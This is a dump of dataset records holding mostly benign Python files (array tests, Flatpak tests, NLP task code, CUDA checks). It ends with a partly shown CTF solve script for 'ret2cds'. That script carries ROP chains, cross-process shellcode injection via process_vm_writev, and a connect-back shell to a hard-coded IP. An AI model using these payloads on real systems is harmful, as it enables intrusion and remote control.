Dataset schema (one row per source file; column name, type, and observed range):

- blob_id: string (length 40)
- directory_id: string (length 40)
- path: string (length 4 to 721)
- content_id: string (length 40)
- detected_licenses: list (length 0 to 57)
- license_type: string (2 classes)
- repo_name: string (length 5 to 91)
- snapshot_id: string (length 40)
- revision_id: string (length 40)
- branch_name: string (321 classes)
- visit_date: timestamp[ns] (2016-08-12 09:31:09 to 2023-09-06 10:45:07)
- revision_date: timestamp[ns] (2010-09-28 14:01:40 to 2023-09-06 06:22:19)
- committer_date: timestamp[ns] (2010-09-28 14:01:40 to 2023-09-06 06:22:19)
- github_id: int64 (426 to 681M)
- star_events_count: int64 (101 to 243k)
- fork_events_count: int64 (0 to 110k)
- gha_license_id: string (23 classes)
- gha_event_created_at: timestamp[ns] (2012-06-28 18:51:49 to 2023-09-14 21:59:16, nullable)
- gha_created_at: timestamp[ns] (2008-02-11 22:55:26 to 2023-08-10 11:14:58, nullable)
- gha_language: string (147 classes)
- src_encoding: string (26 classes)
- language: string (2 classes)
- is_vendor: bool
- is_generated: bool
- length_bytes: int64 (6 to 10.2M)
- extension: string (115 classes)
- filename: string (length 3 to 113)
- content: string (length 6 to 10.2M)
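Each record below follows this schema, with the file itself in the content column. As a minimal sketch of how such rows could be filtered, assuming the dump is loadable with the Hugging Face datasets library (the dataset identifier below is a placeholder, not the real one):

# Hedged sketch, not from the original page: iterate rows with the schema above
# and keep permissively licensed, non-vendored, non-generated Python files.
# "<dataset-id>" is a placeholder; substitute the actual dataset identifier.
from datasets import load_dataset

rows = load_dataset("<dataset-id>", split="train", streaming=True)

for row in rows:
    if (
        row["license_type"] == "permissive"
        and row["language"] == "Python"
        and not row["is_vendor"]
        and not row["is_generated"]
    ):
        # repo_name, path and length_bytes are columns from the schema above.
        print(row["repo_name"], row["path"], row["length_bytes"])
        break  # inspect a single matching record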

blob_id: 2263d8eda07b68d70ae9b2c9b01d7747b80e88d8 | directory_id: b9c01a2ae09be278f1b71fdcd7dcf2ed0b8f0add | content_id: 7adb8b093c6524a09f85065ead1ff98eb419674f
path: /tests/integration/test_array.py | filename: test_array.py | extension: py | length_bytes: 4,995
repo_name: nv-legate/cunumeric | branch_name: refs/heads/branch-23.09 | snapshot_id: aae3e9232edef915e5bcb84f3f216fcc99b648e4 | revision_id: 8dddd18022055374f51e1728e81a49958908e04a
detected_licenses: [BSD-3-Clause, Apache-2.0] | license_type: permissive | gha_license_id: Apache-2.0
visit_date: 2023-09-03T21:17:13.274085 | revision_date: 2023-09-01T01:07:21 | committer_date: 2023-09-01T01:07:21
github_id: 356,975,888 | star_events_count: 447 | fork_events_count: 56 | gha_event_created_at: 2023-09-12T20:41:20 | gha_created_at: 2021-04-11T20:46:50 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
# Copyright 2022 NVIDIA Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np
import pytest
from legate.core import LEGATE_MAX_DIM
import cunumeric as num
SCALARS = (
0,
-10.5,
1 + 1j,
)
ARRAYS = (
[],
(1, 2),
((1, 2),),
[(1, 2), (3, 4.1)],
(
[1, 2.1],
[3, 4 + 4j],
),
)
def strict_type_equal(a, b):
return np.array_equal(a, b) and a.dtype == b.dtype
@pytest.mark.parametrize(
"obj",
(None,) + SCALARS + ARRAYS,
ids=lambda obj: f"(object={obj})",
)
def test_array_basic(obj):
res_np = np.array(obj)
res_num = num.array(obj)
assert strict_type_equal(res_np, res_num)
def test_array_ndarray():
obj = [[1, 2], [3, 4]]
res_np = np.array(np.array(obj))
res_num = num.array(num.array(obj))
assert strict_type_equal(res_np, res_num)
DTYPES = (
np.int32,
np.float64,
np.complex128,
)
@pytest.mark.parametrize("dtype", DTYPES, ids=lambda dtype: f"(dtype={dtype})")
@pytest.mark.parametrize(
"obj",
(0, -10.5, [], [1, 2], [[1, 2], [3, 4.1]]),
ids=lambda obj: f"(object={obj})",
)
def test_array_dtype(obj, dtype):
res_np = np.array(obj, dtype=dtype)
res_num = num.array(obj, dtype=dtype)
assert strict_type_equal(res_np, res_num)
@pytest.mark.parametrize(
"ndmin",
range(-1, LEGATE_MAX_DIM + 1),
ids=lambda ndmin: f"(ndmin={ndmin})",
)
@pytest.mark.parametrize(
"obj",
(0, [], [1, 2], [[1, 2], [3, 4.1]]),
ids=lambda obj: f"(object={obj})",
)
def test_array_ndmin(obj, ndmin):
res_np = np.array(obj, ndmin=ndmin)
res_num = num.array(obj, ndmin=ndmin)
assert strict_type_equal(res_np, res_num)
@pytest.mark.parametrize(
"copy", (True, False), ids=lambda copy: f"(copy={copy})"
)
def test_array_copy(copy):
x = [[1, 2, 3], [4, 5, 6]]
x_np = np.array(x)
xc_np = np.array(x_np, copy=copy)
x_np[0, :] = [7, 8, 9]
x_num = num.array(x)
xc_num = num.array(x_num, copy=copy)
x_num[0, :] = [7, 8, 9]
assert strict_type_equal(xc_np, xc_num)
class TestArrayErrors:
@pytest.mark.parametrize(
"dtype", (np.int32, np.float64), ids=lambda dtype: f"(dtype={dtype})"
)
@pytest.mark.parametrize(
"obj",
(1 + 1j, [1, 2, 3.0, 4 + 4j]),
ids=lambda obj: f"(obj={obj})",
)
def test_invalid_dtype(self, obj, dtype):
expected_exc = TypeError
with pytest.raises(expected_exc):
np.array(obj, dtype=dtype)
with pytest.raises(expected_exc):
num.array(obj, dtype=dtype)
@pytest.mark.parametrize(
"obj",
(None,) + SCALARS + ARRAYS,
ids=lambda obj: f"(object={obj})",
)
def test_asarray_basic(obj):
res_np = np.asarray(obj)
res_num = num.asarray(obj)
assert strict_type_equal(res_np, res_num)
def test_asarray_ndarray():
obj = [[1, 2], [3, 4]]
res_np = np.asarray(np.array(obj))
res_num = num.asarray(num.array(obj))
assert strict_type_equal(res_np, res_num)
@pytest.mark.parametrize("dtype", DTYPES, ids=lambda dtype: f"(dtype={dtype})")
@pytest.mark.parametrize(
"obj",
(0, -10.5, [], [1, 2], [[1, 2], [3, 4.1]]),
ids=lambda obj: f"(object={obj})",
)
def test_asarray_dtype(obj, dtype):
res_np = np.asarray(obj, dtype=dtype)
res_num = num.asarray(obj, dtype=dtype)
assert strict_type_equal(res_np, res_num)
@pytest.mark.parametrize(
"src_dtype, tgt_dtype",
((np.int32, np.complex128), (np.float64, np.int64)),
ids=str,
)
@pytest.mark.parametrize("func", ("array", "asarray"), ids=str)
def test_ndarray_dtype(src_dtype, tgt_dtype, func):
shape = (1, 3, 1)
arr_np = np.ndarray(shape, dtype=src_dtype)
arr_num = num.array(arr_np)
res_np = getattr(np, func)(arr_np, dtype=tgt_dtype)
res_num = getattr(num, func)(arr_num, dtype=tgt_dtype)
assert strict_type_equal(res_np, res_num)
class TestAsArrayErrors:
@pytest.mark.parametrize(
"dtype", (np.int32, np.float64), ids=lambda dtype: f"(dtype={dtype})"
)
@pytest.mark.parametrize(
"obj",
(1 + 1j, [1, 2, 3.0, 4 + 4j]),
ids=lambda obj: f"(object={obj})",
)
def test_invalid_dtype(self, obj, dtype):
expected_exc = TypeError
with pytest.raises(expected_exc):
np.asarray(obj, dtype=dtype)
with pytest.raises(expected_exc):
num.asarray(obj, dtype=dtype)
if __name__ == "__main__":
import sys
sys.exit(pytest.main(sys.argv))

blob_id: 496cc0281595927c854a4a36e1d8261a7c2894ad | directory_id: 3ee5bf329a2e58eb9f775ec5ee6a329fd3541e36 | content_id: bc8861574f27b054eb7c9fc86e2f6a10b0c45882
path: /scrapy/http/common.py | filename: common.py | extension: py | length_bytes: 240
repo_name: scrapy/scrapy | branch_name: refs/heads/master | snapshot_id: 53bd79e500e2cb7441d33bfd61ba003962d5fb46 | revision_id: cddb8c15d66831dc4e1bc4b745fcc6c534bb03dc
detected_licenses: [BSD-3-Clause] | license_type: permissive | gha_license_id: BSD-3-Clause
visit_date: 2023-08-31T04:08:06.193342 | revision_date: 2023-08-30T18:29:54 | committer_date: 2023-08-30T18:29:54
github_id: 529,502 | star_events_count: 47,472 | fork_events_count: 12,120 | gha_event_created_at: 2023-09-14T12:08:07 | gha_created_at: 2010-02-22T02:01:14 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
def obsolete_setter(setter, attrname):
def newsetter(self, value):
c = self.__class__.__name__
msg = f"{c}.{attrname} is not modifiable, use {c}.replace() instead"
raise AttributeError(msg)
return newsetter

blob_id: 5210af0064245d8b188e0e3d809bbeee61edfe97 | directory_id: 44ba493efd0fd7ae78880d3d93cc0d66166935e5 | content_id: 0f977a8d3f79ef46db8733b7567ad4157e647315
path: /tests/platforms/linux/flatpak/test_create.py | filename: test_create.py | extension: py | length_bytes: 1,844
repo_name: beeware/briefcase | branch_name: refs/heads/main | snapshot_id: 1b3eaebf0791728c68986809aa07abc436e422c6 | revision_id: cc2dae1ffc58f9700d0ca57461cb05909bc01bec
detected_licenses: [BSD-3-Clause] | license_type: permissive | gha_license_id: BSD-3-Clause
visit_date: 2023-09-01T19:24:15.424713 | revision_date: 2023-09-01T04:35:53 | committer_date: 2023-09-01T04:35:53
github_id: 39,841,700 | star_events_count: 1,609 | fork_events_count: 256 | gha_event_created_at: 2023-09-11T10:04:34 | gha_created_at: 2015-07-28T15:20:03 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
from unittest.mock import MagicMock
import pytest
from briefcase.console import Console, Log
from briefcase.exceptions import BriefcaseConfigError, UnsupportedHostError
from briefcase.integrations.flatpak import Flatpak
from briefcase.platforms.linux.flatpak import LinuxFlatpakCreateCommand
@pytest.fixture
def create_command(tmp_path):
return LinuxFlatpakCreateCommand(
logger=Log(),
console=Console(),
base_path=tmp_path / "base_path",
data_path=tmp_path / "briefcase",
)
@pytest.mark.parametrize("host_os", ["Darwin", "Windows", "WeirdOS"])
def test_unsupported_host_os(create_command, host_os):
"""Error raised for an unsupported OS."""
create_command.tools.host_os = host_os
with pytest.raises(
UnsupportedHostError,
match="Flatpaks can only be built on Linux.",
):
create_command()
def test_output_format_template_context(create_command, first_app_config):
"""The template context is provided flatpak details."""
first_app_config.flatpak_runtime = "org.beeware.Platform"
first_app_config.flatpak_runtime_version = "37.42"
first_app_config.flatpak_sdk = "org.beeware.SDK"
assert create_command.output_format_template_context(first_app_config) == {
"flatpak_runtime": "org.beeware.Platform",
"flatpak_runtime_version": "37.42",
"flatpak_sdk": "org.beeware.SDK",
}
def test_missing_runtime_config(create_command, first_app_config):
"""The app creation errors is a Flatpak runtime is not defined."""
create_command.tools.flatpak = MagicMock(spec_set=Flatpak)
with pytest.raises(
BriefcaseConfigError,
match="Briefcase configuration error: The App does not specify the Flatpak runtime to use",
):
create_command.output_format_template_context(first_app_config)

blob_id: a177abe57e8437ded1b3ca45927e0a56f0304ece | directory_id: b8b1245cd42d76bbf07f618a6ac164f5b93e8652 | content_id: 5a53e4313ca054f3c875c8c2eceec93268bff191
path: /nnmnkwii/autograd/__init__.py | filename: __init__.py | extension: py | length_bytes: 260
repo_name: r9y9/nnmnkwii | branch_name: refs/heads/master | snapshot_id: ff20074b27f8b3e8afb47a2e83c829e1869e24c9 | revision_id: def33752d2907d241c379574da1e1b5ae979cd99
detected_licenses: [MIT] | license_type: permissive | gha_license_id: NOASSERTION
visit_date: 2023-08-22T18:59:44.128812 | revision_date: 2023-02-03T11:06:48 | committer_date: 2023-02-03T11:06:48
github_id: 96,328,821 | star_events_count: 410 | fork_events_count: 88 | gha_event_created_at: 2023-02-03T11:06:49 | gha_created_at: 2017-07-05T14:33:50 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
from ._impl.mlpg import MLPG # noqa
from ._impl.mlpg import UnitVarianceMLPG # noqa
from ._impl.mlpg import mlpg # noqa
from ._impl.mlpg import unit_variance_mlpg # noqa
from ._impl.modspec import ModSpec # noqa
from ._impl.modspec import modspec # noqa

blob_id: bdd7c61a0f404b51ad0bbe65c585642a05c975be | directory_id: 9abc1fe64663e658c1926f0e238004ce890437bf | content_id: 19021fa1465124098e42193b1465297322a41b92
path: /torcms_metadata/pycsw_helper/cfg_demo.py | filename: cfg_demo.py | extension: py | length_bytes: 83
repo_name: bukun/TorCMS | branch_name: refs/heads/master | snapshot_id: e7a8a3a0e4e728e64d2a34c56d694e48e0e3a098 | revision_id: f9afae46a5029d213d5fb60850c93b37b813ae15
detected_licenses: [MIT] | license_type: permissive | gha_license_id: MIT
visit_date: 2023-08-31T05:37:35.861174 | revision_date: 2023-08-29T02:41:12 | committer_date: 2023-08-29T02:41:12
github_id: 30,642,412 | star_events_count: 256 | fork_events_count: 105 | gha_event_created_at: 2023-07-20T02:24:20 | gha_created_at: 2015-02-11T10:22:06 | gha_language: CSS
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
from peewee import SqliteDatabase
pycsw_db = SqliteDatabase('database/cite.db')

blob_id: 1f71c6c4ead8c8c21d6560c0bdf4216debdcb80c | directory_id: 2571ab21fd3b1281a534f0073a4229c9f215c20f | content_id: e21a9baf43c2c31919518165e544e00097ef6f66
path: /jiant/tasks/lib/ccg.py | filename: ccg.py | extension: py | length_bytes: 5,553
repo_name: nyu-mll/jiant | branch_name: refs/heads/master | snapshot_id: 5ed71cfef826e1e4c3b529371b1f40642a96ab48 | revision_id: daa5a258e3af5e7503288de8401429eaf3f58e13
detected_licenses: [MIT] | license_type: permissive | gha_license_id: MIT
visit_date: 2023-09-02T15:58:19.260599 | revision_date: 2022-10-17T19:34:56 | committer_date: 2022-10-17T19:34:56
github_id: 137,789,266 | star_events_count: 1,289 | fork_events_count: 302 | gha_event_created_at: 2023-07-06T22:00:39 | gha_created_at: 2018-06-18T18:12:47 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
import numpy as np
import torch
from dataclasses import dataclass
from typing import List, Union
from jiant.tasks.core import (
BaseExample,
BaseTokenizedExample,
BaseDataRow,
BatchMixin,
Task,
TaskTypes,
)
from jiant.tasks.lib.templates.shared import (
labels_to_bimap,
create_input_set_from_tokens_and_segments,
construct_single_input_tokens_and_segment_ids,
pad_single_with_feat_spec,
)
from jiant.tasks.lib.templates import hacky_tokenization_matching as tokenization_utils
from jiant.utils.python.io import read_json
@dataclass
class Example(BaseExample):
guid: str
text: str
tag_ids: List[int]
def tokenize(self, tokenizer):
tokenized = tokenizer.tokenize(self.text)
split_text = self.text.split(" ") # CCG data is space-tokenized
input_flat_stripped = tokenization_utils.input_flat_strip(split_text)
flat_stripped, indices = tokenization_utils.flat_strip(
tokens=tokenized,
tokenizer=tokenizer,
return_indices=True,
)
assert flat_stripped == input_flat_stripped
positions = tokenization_utils.map_tags_to_token_position(
flat_stripped=flat_stripped,
indices=indices,
split_text=split_text,
)
labels, label_mask = tokenization_utils.convert_mapped_tags(
positions=positions,
tag_ids=self.tag_ids,
length=len(tokenized),
)
return TokenizedExample(
guid=self.guid,
text=tokenizer.tokenize(self.text),
labels=labels,
label_mask=label_mask,
)
@dataclass
class TokenizedExample(BaseTokenizedExample):
guid: str
text: List
labels: List[Union[int, None]]
label_mask: List[int]
def featurize(self, tokenizer, feat_spec):
unpadded_inputs = construct_single_input_tokens_and_segment_ids(
input_tokens=self.text,
tokenizer=tokenizer,
feat_spec=feat_spec,
)
input_set = create_input_set_from_tokens_and_segments(
unpadded_tokens=unpadded_inputs.unpadded_tokens,
unpadded_segment_ids=unpadded_inputs.unpadded_segment_ids,
tokenizer=tokenizer,
feat_spec=feat_spec,
)
# Replicate padding / additional tokens for the label ids and mask
if feat_spec.sep_token_extra:
label_suffix = [None, None]
mask_suffix = [0, 0]
special_tokens_count = 3 # CLS, SEP-SEP
else:
label_suffix = [None]
mask_suffix = [0]
special_tokens_count = 2 # CLS, SEP
unpadded_labels = (
[None] + self.labels[: feat_spec.max_seq_length - special_tokens_count] + label_suffix
)
unpadded_labels = [i if i is not None else -1 for i in unpadded_labels]
unpadded_label_mask = (
[0] + self.label_mask[: feat_spec.max_seq_length - special_tokens_count] + mask_suffix
)
padded_labels = pad_single_with_feat_spec(
ls=unpadded_labels,
feat_spec=feat_spec,
pad_idx=-1,
)
padded_label_mask = pad_single_with_feat_spec(
ls=unpadded_label_mask,
feat_spec=feat_spec,
pad_idx=0,
)
return DataRow(
guid=self.guid,
input_ids=np.array(input_set.input_ids),
input_mask=np.array(input_set.input_mask),
segment_ids=np.array(input_set.segment_ids),
label_ids=np.array(padded_labels),
label_mask=np.array(padded_label_mask),
tokens=unpadded_inputs.unpadded_tokens,
)
@dataclass
class DataRow(BaseDataRow):
guid: str
input_ids: np.ndarray
input_mask: np.ndarray
segment_ids: np.ndarray
label_ids: np.ndarray
label_mask: np.ndarray
tokens: list
@dataclass
class Batch(BatchMixin):
input_ids: torch.LongTensor
input_mask: torch.LongTensor
segment_ids: torch.LongTensor
label_ids: torch.LongTensor
label_mask: torch.LongTensor
tokens: list
class CCGTask(Task):
Example = Example
TokenizedExample = Example
DataRow = DataRow
Batch = Batch
TASK_TYPE = TaskTypes.TAGGING
LABELS = range(1363)
LABEL_TO_ID, ID_TO_LABEL = labels_to_bimap(LABELS)
@property
def num_labels(self):
return 1363
def get_train_examples(self):
return self._create_examples(path=self.train_path, set_type="train")
def get_val_examples(self):
return self._create_examples(self.val_path, set_type="val")
def get_test_examples(self):
return self._create_examples(path=self.test_path, set_type="test")
def get_tags_to_id(self):
tags_to_id = read_json(self.path_dict["tags_to_id"])
tags_to_id = {k: int(v) for k, v in tags_to_id.items()}
return tags_to_id
def _create_examples(self, path, set_type):
tags_to_id = self.get_tags_to_id()
examples = []
with open(path, "r") as f:
for i, line in enumerate(f):
text, tags = line.strip().split("\t")
split_tags = tags.split()
tag_ids = [tags_to_id[tag] for tag in split_tags]
examples.append(
Example(
guid="%s-%s" % (set_type, i),
text=text,
tag_ids=tag_ids,
)
)
return examples

blob_id: 5d78f06056f08d6be52b766dc4935c121a9fb701 | directory_id: ff4ce3522d502248f56b32438b303c3301185709 | content_id: 719bfd8677f1d7581b6bd89df89ff171de9c6fc3
path: /cwltool/cuda.py | filename: cuda.py | extension: py | length_bytes: 2,341
repo_name: common-workflow-language/cwltool | branch_name: refs/heads/main | snapshot_id: d8304f3dcd6e31bda6d0ea11452b692987e39b28 | revision_id: bd89c5694685bff46bf56fb32316c8f6fe0d799d
detected_licenses: [Apache-2.0] | license_type: permissive | gha_license_id: Apache-2.0
visit_date: 2023-08-24T09:43:39.331516 | revision_date: 2023-08-23T15:05:17 | committer_date: 2023-08-23T16:45:11
github_id: 43,816,051 | star_events_count: 336 | fork_events_count: 258 | gha_event_created_at: 2023-09-13T10:55:19 | gha_created_at: 2015-10-07T13:03:05 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
"""Support utilities for CUDA."""
import subprocess # nosec
import xml.dom.minidom # nosec
from typing import Tuple
from .loghandler import _logger
from .utils import CWLObjectType
def cuda_version_and_device_count() -> Tuple[str, int]:
"""Determine the CUDA version and number of attached CUDA GPUs."""
try:
out = subprocess.check_output(["nvidia-smi", "-q", "-x"]) # nosec
except Exception as e:
_logger.warning("Error checking CUDA version with nvidia-smi: %s", e)
return ("", 0)
dm = xml.dom.minidom.parseString(out) # nosec
ag = dm.getElementsByTagName("attached_gpus")
if len(ag) < 1 or ag[0].firstChild is None:
_logger.warning(
"Error checking CUDA version with nvidia-smi. Missing 'attached_gpus' or it is empty.: %s",
out,
)
return ("", 0)
ag_element = ag[0].firstChild
cv = dm.getElementsByTagName("cuda_version")
if len(cv) < 1 or cv[0].firstChild is None:
_logger.warning(
"Error checking CUDA version with nvidia-smi. Missing 'cuda_version' or it is empty.: %s",
out,
)
return ("", 0)
cv_element = cv[0].firstChild
if isinstance(cv_element, xml.dom.minidom.Text) and isinstance(
ag_element, xml.dom.minidom.Text
):
return (cv_element.data, int(ag_element.data))
_logger.warning(
"Error checking CUDA version with nvidia-smi. "
"Either 'attached_gpus' or 'cuda_version' was not a text node: %s",
out,
)
return ("", 0)
def cuda_check(cuda_req: CWLObjectType, requestCount: int) -> int:
try:
vmin = float(str(cuda_req["cudaVersionMin"]))
version, devices = cuda_version_and_device_count()
if version == "":
# nvidia-smi not detected, or failed some other way
return 0
versionf = float(version)
if versionf < vmin:
_logger.warning("CUDA version '%s' is less than minimum version '%s'", version, vmin)
return 0
if requestCount > devices:
_logger.warning("Requested %d GPU devices but only %d available", requestCount, devices)
return 0
return requestCount
except Exception as e:
_logger.warning("Error checking CUDA requirements: %s", e)
return 0
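A hedged usage sketch of the two helpers above (not part of cwltool/cuda.py; the "cudaVersionMin" key is the one cuda_check reads, and the version value is illustrative only):

# Sketch: query the local CUDA setup, then check a hypothetical requirement.
version, devices = cuda_version_and_device_count()
print(f"CUDA version: {version or 'not detected'}, attached GPUs: {devices}")
granted = cuda_check({"cudaVersionMin": "11.4"}, requestCount=1)
print("granted devices:", granted)  # 0 means the requirement could not be met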

blob_id: 0544962f867fbbba5f72d94be06d599b1bfc79a1 | directory_id: bc371b9238956bc00cc33654b1d68651c6edf371 | content_id: aa79e0c645d2017ff1ff6d876e8b2e1748471193
path: /writeups/2021/corCTF/ret2cds/chall/solve.py | filename: solve.py | extension: py | length_bytes: 10,124
repo_name: welchbj/ctf | branch_name: refs/heads/master | snapshot_id: 447202921fbf5c467af62b4f72f5f489c7c471f0 | revision_id: 3b54769a8312f755eb97e7b4c954e4b5829af8e1
detected_licenses: [MIT] | license_type: permissive | gha_license_id: MIT
visit_date: 2023-08-19T03:28:33.264186 | revision_date: 2023-08-11T18:38:17 | committer_date: 2023-08-11T18:38:17
github_id: 213,223,536 | star_events_count: 167 | fork_events_count: 28 | gha_event_created_at: 2023-04-18T13:29:33 | gha_created_at: 2019-10-06T18:42:03 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false
content:
#!/usr/bin/env python3
from pwn import *
the_binary = "./ret2cds"
context.binary = the_binary
elf = context.binary
libc = ELF("./libc.so.6", checksec=False)
context.terminal = ["tmux", "splitw", "-h"]
if args.REMOTE:
io = remote(args.HOST, int(args.PORT))
elif args.STRACE:
io = process(["strace", "-o", "trace.txt", the_binary])
else:
io = process(the_binary)
if args.GDB:
gdb.attach(io, f"""
file {the_binary}
break *0x4012ba
ignore 1 2
# set breakpoint pending on
# break *0xdead0000
continue
""")
def libc_off(offset):
return libc.address + offset
class Gadgets:
elf_main = 0x40123a
# 0x0000000000401016: ret;
ret = 0x0000000000401016
# 0x000000000040131b: pop rdi; ret;
pop_rdi = 0x000000000040131b
# 0x0000000000401319: pop rsi; pop r15; ret;
pop_rsi_pop_r15 = 0x0000000000401319
# 0x00000000001626d6: pop rdx; pop rbx; ret;
@property
def pop_rdx_pop_rbx(self):
return libc_off(0x00000000001626d6)
# 0x000000000004a550: pop rax; ret;
@property
def pop_rax(self):
return libc_off(0x000000000004a550)
# 0x00000000001536e9: pop rax; call rax;
@property
def pop_rax_call_rax(self):
return libc_off(0x00000000001536e9)
# 0x0000000000156108: mov r8, rax; mov rax, r8; pop rbx; ret;
@property
def mov_r8_rax_mov_rax_r8_pop_rbx(self):
return libc_off(0x0000000000156108)
# 0x000000000007d2f0: mov r9, rax; pop r12; pop r13; mov rax, r9; pop r14; ret;
@property
def mov_r9_rax_pop_r12_pop_r13_mov_rax_r9_pop_r14(self):
return libc_off(0x000000000007d2f0)
# 0x000000000007b0cb: mov r10, rdx; jmp rax;
@property
def mov_r10_rdx_jmp_rax(self):
return libc_off(0x000000000007b0cb)
# 0x0000000000066229: syscall; ret;
@property
def syscall(self):
return libc_off(0x0000000000066229)
class Const:
rip_offset = 0x108
SYS_process_vm_readv = 310
SYS_process_vm_writev = 311
mmap_base = 0xdead0000
iovec_local = 0xdead3000
iovec_remote = 0xdead6000
iovec_size = 0x3000
mmap_size = 0x9000
hello_msg = "hello"
msg_prologue = "__mbegin__"
msg_epilogue = "__mend__"
process_read_err = "pread err"
process_write_err = "pwrite err"
# CDS leads to RWX segment at static address, more context here:
# https://docs.oracle.com/javase/8/docs/technotes/guides/vm/class-data-sharing.html
cds_rwx_base = 0x800000000
cds_len_to_read = 1
cds_rwx_size = 0x2000
# final_payload_listen_host = "172.17.0.1"
final_payload_listen_host = "137.184.74.226"
final_payload_listen_port = 80
shellcode = f"""
jmp do_it
hello_msg:
.string "{Const.hello_msg}"
.byte 0
process_read_err:
.string "{Const.process_read_err}"
.byte 0
process_write_err:
.string "{Const.process_write_err}"
.byte 0
msg_prologue:
.string "{Const.msg_prologue}"
.byte 0
msg_epilogue:
.string "{Const.msg_epilogue}"
.byte 0
do_it:
lea rdi,[rip+hello_msg]
mov rsi,{len(Const.hello_msg)}
call echo_msg
/* Read process mem loop to find target process PID. */
mov rbx,1
pid_search_loop:
/* Main loop, current PID search value expected in rbx. */
push rbx
mov rdi,rbx
mov rsi,{hex(Const.cds_rwx_base)}
mov rdx,1
call read_process_mem
cmp rax,1
jne bad_pread
/* We found the PID. Send it to ourselves and then jump to writing
shellcode into its address space. */
lea rdi,[rsp]
mov rsi,8
call echo_msg
pop rbx
jmp write_shellcode
bad_pread:
/* Didn't find the PID, increment our counter and continue the search. */
pop rbx
inc rbx
jmp pid_search_loop
/* Write shellcode to the identified parent process. Expects the target
PID in rbx. */
write_shellcode:
mov rdi,rbx
lea rsi,[rip+final_shellcode]
mov rdx,the_end - final_shellcode
mov r10,{hex(Const.cds_rwx_base)}
call write_process_mem
call exit
/* Args:
- rdi: Address holding the data to print.
- rsi: Length of data to print.
*/
echo_data:
mov rdx,rsi
mov rsi,rdi
mov rdi,STDOUT_FILENO
mov rax,SYS_write
syscall
ret
echo_prologue:
lea rdi,[rip+msg_prologue]
mov rsi,{len(Const.msg_prologue)}
call echo_data
ret
echo_epilogue:
lea rdi,[rip+msg_epilogue]
mov rsi,{len(Const.msg_epilogue)}
call echo_data
ret
/* Same as echo_data, but prepends and appends a message prologue/epilogue. */
echo_msg:
push rdi
push rsi
call echo_prologue
pop rsi
pop rdi
call echo_data
call echo_epilogue
ret
/* Args:
- rdi: PID of process whose memory to read.
- rsi: Memory address to read from
- rdx: Length of region to read
Returns: 1 on success, 0 on error.
*/
read_process_mem:
mov rcx,rsi
mov rbx,rdx
/* Setup local iovec, indicating where to write the data read from the
remote process. */
mov rsi,{hex(Const.iovec_local)}
mov dword ptr [rsi+0],{hex(Const.iovec_local+0x10)}
mov [rsi+8],rbx
mov rdx,1
/* Setup remote iovec, indicating where we want to read from in the remote
process. */
mov r10,{hex(Const.iovec_remote)}
mov [r10+0],rcx
mov [r10+8],rbx
mov r8,{Const.cds_len_to_read}
/* No flags. */
mov r9,0
/* Do the syscall. */
mov rax,{Const.SYS_process_vm_readv}
syscall
/* rax now holds how many bytes were read from the remote process memory,
or -1 on error. */
cmp rax,0
jle read_process_mem_err
/* No error, write the process memory back to ourselves. */
mov rdi,{hex(Const.iovec_local+0x10)}
mov rsi,rax
call echo_msg
mov rax,1
ret
read_process_mem_err:
lea rdi,[rip+process_read_err]
mov rsi,{len(Const.process_read_err)}
call echo_msg
mov rax,0
ret
/* Args:
- rdi: PID of process whose memory to read.
- rsi: Local memory address containing data to write
- rdx: Length of data to write to remote process
- r10: Remote memory address to write to
Returns: 1 on success, 0 on error.
*/
write_process_mem:
mov rbx,rsi
mov rcx,rdx
mov r12,r10
/* Setup local iovec, indicating what local data should be written to the
remote process. */
mov rsi,{hex(Const.iovec_local)}
mov [rsi+0],rbx
mov [rsi+8],rcx
mov rdx,1
/* Setup remote iovec, indicating where we should be writing in the remote
process. */
mov r10,{hex(Const.iovec_remote)}
mov [r10+0],r12
mov [r10+8],rcx
mov r8,1
/* No flags. */
mov r9,0
/* Do the syscall. */
mov rax,{Const.SYS_process_vm_writev}
syscall
/* rax now holds how many bytes were written to the remote process memory,
or -1 on error. */
cmp rax,0
jle write_process_mem_err
/* No error, return success. */
mov rax,1
ret
write_process_mem_err:
lea rdi,[rip+process_write_err]
mov rsi,{len(Const.process_write_err)}
call echo_msg
mov rax,0
ret
exit:
mov rax,SYS_exit
syscall
final_shellcode:
.rept 100
nop
.endr
"""
shellcode += shellcraft.connect(Const.final_payload_listen_host, Const.final_payload_listen_port)
shellcode += shellcraft.dupsh()
shellcode += """
the_end:
nop
"""
shellcode = asm(shellcode, vma=Const.mmap_base)
def recv_shellcode_msg():
io.recvuntil(Const.msg_prologue)
msg = io.recvuntil(Const.msg_epilogue, drop=True)
return msg
g = Gadgets()
def do_rop(*gadgets):
chain = b""
chain += b"A"*Const.rip_offset
chain += flat(*gadgets)
assert len(chain) <= 0x200
io.sendafter("warden: ", chain)
if args.PAUSE:
input("Pausing before sending anything...")
# leak a libc address
do_rop(
g.pop_rdi,
constants.STDOUT_FILENO,
g.pop_rsi_pop_r15,
elf.got.read,
0xdeadbeef,
# rdx already equals 0x1d from the program's last write
elf.plt.write,
g.elf_main
)
io.recvuntil("escaping...\n")
leak = io.recvuntil("Welcome", drop=True)
libc_read = u64(leak[1:9])
libc.address = libc_read - libc.sym.read
log.info("read@libc: %#x" % libc_read)
log.info("libc base: %#x" % libc.address)
# map a rwx segment
do_rop(
# rdi = addr
g.pop_rdi,
Const.mmap_base,
# rsi = len
g.pop_rsi_pop_r15,
Const.mmap_size,
0xdeadbeef,
# r10 = flags
g.pop_rax,
g.ret,
g.pop_rdx_pop_rbx,
constants.MAP_PRIVATE | constants.MAP_FIXED | constants.MAP_ANON,
